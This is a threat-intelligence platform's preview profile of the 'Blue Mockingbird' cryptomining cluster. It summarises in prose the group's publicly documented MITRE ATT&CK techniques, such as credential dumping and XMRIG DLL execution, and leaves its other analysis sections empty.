3C-INT logo [Cyber]Crime Characterization for Intelligence FREE PREVIEW
You are exploring the Free preview. To unlock full read-only access to all public profiles and in-app notifications, create a free research account. For analyst / premium plans capabilities (editing, advanced tabs, exports), please contact us

Threat Actor Characterization

Back
You’re viewing the read-only version. Sign in for analyst tools (editors, promote draft, file/relations management, etc.)
Blue Mockingbird

Blue Mockingbird

ID: 8c0aa8783c9b2d5250408b8edf3fb67958982
Cybercrime Cybercriminal
Threat types: Cryptomining, Intrusion, Malware
Unknown UNKNOWN
Updated: 2026-01-13
Created: 2025-10-21
Progress: 35% Completeness: 28% Freshness: 50%
Operation zone: UNKNOWN
Aliases Limited alias preview
No aliases registered.
Actor Network Graph
Open Network Graph
Read-only preview for anonymous visitors. Sign in with a free Research account for full workspace.
MITRE ATT&CK®
confidence: medium
Actor Techniques page ATT&CK® Diagram

Blue Mockingbird is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019. Ref: https://attack.mitre.org/groups/G0108/


Technique Technique name Tactics Evidence
T1003.001 LSASS Memory TA0006
  • OS Credential Dumping: LSASS Memory - Blue Mockingbird has used Mimikatz to retrieve credentials from LSASS memory. · ref
T1021.001 Remote Desktop Protocol TA0008
  • Remote Services: Remote Desktop Protocol - Blue Mockingbird has used Remote Desktop to log on to servers interactively and manually copy files to remote hosts. · ref
T1021.002 SMB/Windows Admin Shares TA0008
  • Remote Services: SMB/Windows Admin Shares - Blue Mockingbird has used Windows Explorer to manually copy malicious files to remote hosts over SMB. · ref
T1027.013 Encrypted/Encoded File TA0005
  • Obfuscated Files or Information: Encrypted/Encoded File - Blue Mockingbird has obfuscated the wallet address in the payload binary. · ref
T1036.005 Match Legitimate Resource Name or Location TA0005
  • Masquerading: Match Legitimate Resource Name or Location - Blue Mockingbird has masqueraded their XMRIG payload name by naming it wercplsupporte.dll after the legitimate wercplsupport.dll file. · ref
T1053.005 Scheduled Task TA0002 TA0003 TA0004
  • Scheduled Task/Job: Scheduled Task - Blue Mockingbird has used Windows Scheduled Tasks to establish persistence on local and remote hosts. · ref
T1059.001 PowerShell TA0002
  • Command and Scripting Interpreter: PowerShell - Blue Mockingbird has used PowerShell reverse TCP shells to issue interactive commands over a network connection. · ref
T1059.003 Windows Command Shell TA0002
  • Command and Scripting Interpreter: Windows Command Shell - Blue Mockingbird has used batch script files to automate execution and deployment of payloads. · ref
T1218.010 Regsvr32 TA0005
  • System Binary Proxy Execution: Regsvr32 - Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using regsvr32.exe. · ref
T1218.011 Rundll32 TA0005
  • System Binary Proxy Execution: Rundll32 - Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using rundll32.exe. · ref
T1496.001 Compute Hijacking TA0040
  • Resource Hijacking: Compute Hijacking - Blue Mockingbird has used XMRIG to mine cryptocurrency on victim systems. · ref
T1543.003 Windows Service TA0003 TA0004
  • Create or Modify System Process: Windows Service - Blue Mockingbird has made their XMRIG payloads persistent as a Windows Service. · ref
T1546.003 Windows Management Instrumentation Event Subscription TA0003 TA0004
  • Event Triggered Execution: Windows Management Instrumentation Event Subscription - Blue Mockingbird has used mofcomp.exe to establish WMI Event Subscription persistence mechanisms configured from a *.mof file. · ref
T1569.002 Service Execution TA0002
  • System Services: Service Execution - Blue Mockingbird has executed custom-compiled XMRIG miner DLLs by configuring them to execute via the "wercplsupport" service. · ref
T1574.012 COR_PROFILER TA0003 TA0004 TA0005
  • Hijack Execution Flow: COR_PROFILER - Blue Mockingbird has used wmic.exe and Windows Registry modifications to set the COR_PROFILER environment variable to execute a malicious DLL whenever a process loads the .NET CLR. · ref
T1588.002 Tool TA0042
  • Obtain Capabilities: Tool - Blue Mockingbird has obtained and used tools such as Mimikatz. · ref
Strategic Intelligence
Limited preview
No content.
Full strategic intelligence is available in Analyst and Premium plans.
Executive Analyst Brief for CISO
Empty Limited preview
No content yet.
Tip: Hover the section title to learn what’s included in Analyst / Premium plans.
Executive brief now
Saved successfully.
Hunting Playbook
Empty Limited preview
No content yet.
Tip: Hover the section title to learn what’s included in Analyst / Premium plans.
Hunting Playbook now
Saved successfully.
IOC Appendix
Empty Limited preview
No content yet.
IOC Appendix now
Saved successfully.
OSINT Library
Empty Limited preview
No content yet.
OSINT Library now
Saved successfully.
Social Medial & Communication
SOCMINT integrated: 0/0
No social links registered for this profile.
Notes: preview mode hides sensitive social/contact details.
Reference Images/Associated Evidence Limited
No images found for this threat.